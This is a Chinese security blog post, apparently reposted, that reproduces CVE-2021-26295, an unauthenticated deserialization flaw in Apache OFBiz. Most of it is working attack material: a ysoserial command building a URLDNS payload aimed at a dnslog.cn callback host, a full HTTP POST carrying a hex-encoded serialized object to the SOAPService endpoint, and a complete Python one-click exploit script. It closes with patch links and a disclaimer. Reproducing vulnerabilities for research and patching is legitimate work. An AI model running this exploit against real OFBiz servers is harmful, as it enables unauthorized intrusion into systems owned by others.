CVE-2021-26295:Apache OFBiz反序列化漏洞复现

admin
admin
admin
138429
文章
113
评论
2024年2月7日23:52:52评论25 views字数 4174阅读13分54秒阅读模式
Apache OFBiz 是用于企业流程自动化的开源产品,包括 ERP(企业资源规划)、CRM(客户关系管理)、电子商务/电子商务、SCM(供应链管理)、MRP(制造资源规划)、MMS / EAM(维护管理系统/企业资产管理)的框架组件和业务应用。
0x02 漏洞概述
近日,Apache OFBiz官方发布安全更新Apache OFBiz存在RMI反序列化前台命令执行,未经身份验证的攻击者可以使用此漏洞来成功接管Apache OFBiz。
0x03 影响版本

Apache OFBiz < 17.12.06

0x04 环境搭建

环境搭建采用docker搭建,比较方便

docker run -d -p 811:8080 -p 8443:8443  opensourceknight/ofbiz

网址 https://your_ip:8443

能正常访问即说明环境搭建成功

CVE-2021-26295:Apache OFBiz反序列化漏洞复现

0x05 漏洞复现

使用的工具和脚本:

java反序列利用工具ysoserial-0.0.6-SNAPSHOT-all.jar

str_hex.py

#!/usr/bin/python#conding=utf8import binasciiwith open('payload.txt', 'rb') as payload_handle:   content = payload_handle.read()str_hex = binascii.hexlify(content)print(str_hex)

1、通过ysoserial-0.0.6-SNAPSHOT-all.jar生成dns回显的payload

CVE-2021-26295:Apache OFBiz反序列化漏洞复现

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http://nu2xus.dnslog.cn > payload.txt
2、通过python脚本将payload转换为hex

python str_hex.py

CVE-2021-26295:Apache OFBiz反序列化漏洞复现

3、构造dns回显poc

poc路径:/webtools/control/SOAPService

POST /webtools/control/SOAPService HTTP/1.1Host: 172.16.61.130:8443User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Type: test/xmlContent-Length: 875<?xml version='1.0' encoding='UTF-8'?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header/><soapenv:Body><ying:clearAllEntityCaches xmlns:ying="http://ofbiz.apache.org/service/"><ying:cus-obj>aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00034c0004686f737471007e00034c000870726f746f636f6c71007e00034c000372656671007e00037870ffffffffffffffff7400106e75327875732e646e736c6f672e636e74000071007e0005740004687474707078740017687474703a2f2f6e75327875732e646e736c6f672e636e78</ying:cus-obj></ying:clearAllEntityCaches></soapenv:Body></soapenv:Envelope>

CVE-2021-26295:Apache OFBiz反序列化漏洞复现

查看dnslog.cn可以看见已经存在访问记录了

CVE-2021-26295:Apache OFBiz反序列化漏洞复现

4.、py一键测试

将ysoserial文件跟OFBiz.py文件放在同目录

#!/usr/bin/python# coding=utf8import sysimport requestsimport sslfrom optparse import OptionParserimport osimport binasciifrom fake_useragent import UserAgentfrom requests.packages.urllib3.exceptions import InsecureRequestWarningssl._create_default_https_context = ssl._create_unverified_contextrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)def addoptions(): hstr = 'python3 7961.py -u https://192.168.1.1:8443 -d http://dnslog.cn' opt = OptionParser(hstr) opt.add_option('-d','--dnslog',type='string',action="store",dest='dnslog',help='dnslog') opt.add_option('-u', '--url', type='string', action="store", dest='url', help='target_url') (opts,args) = opt.parse_args() global dnslog global url dnslog = opts.dnslog url = opts.url if not opts.dnslog: sys.exit("must be given target url,use -d ") if not opts.url: sys.exit("must be given target url,use -u ")def exploit(url,dnslog): payload_url = url + '/webtools/control/SOAPService' os.system(f'java -jar ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS {dnslog} > payload.txt') with open('payload.txt', 'rb') as payload_handle: content = payload_handle.read() payload = binascii.hexlify(content).decode() data = f"""<?xml version='1.0' encoding='UTF-8'?> <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header/><soapenv:Body> <ying:clearAllEntityCaches xmlns:ying="http://ofbiz.apache.org/service/"> <ying:cus-obj>{payload}</ying:cus-obj> </ying:clearAllEntityCaches> </soapenv:Body> </soapenv:Envelope>""" headers["Content-Type"]="text/xml" try: rep = requests.post(payload_url, data=data, verify=False, headers=headers) if rep.status_code == 200: print('[+]poc is completed') else: print('[-] poc failed') rep.close() except: print('[-]http access failed')if __name__ == '__main__': ua = UserAgent() headers = { 'User-Agent': ua.random } dnslog = '' url = '' addoptions() exploit(url,dnslog)

0x06 修复方式

可更新至Apache OFBiz最新版

下载地址:

https://ofbiz.apache.org/download.html#vulnerabilities

应用漏洞补丁下载链接:

https://github.com/apache/ofbiz-fr amework/commit/af9ed4e/

参考链接:
https://nosec.org/home/detail/4705.html
https://www.o2oxy.cn/3271.html
CVE-2021-26295:Apache OFBiz反序列化漏洞复现

原文始发于微信公众号(玄魂工作室):CVE-2021-26295:Apache OFBiz反序列化漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月7日23:52:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2021-26295:Apache OFBiz反序列化漏洞复现https://cn-sec.com/archives/784003.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息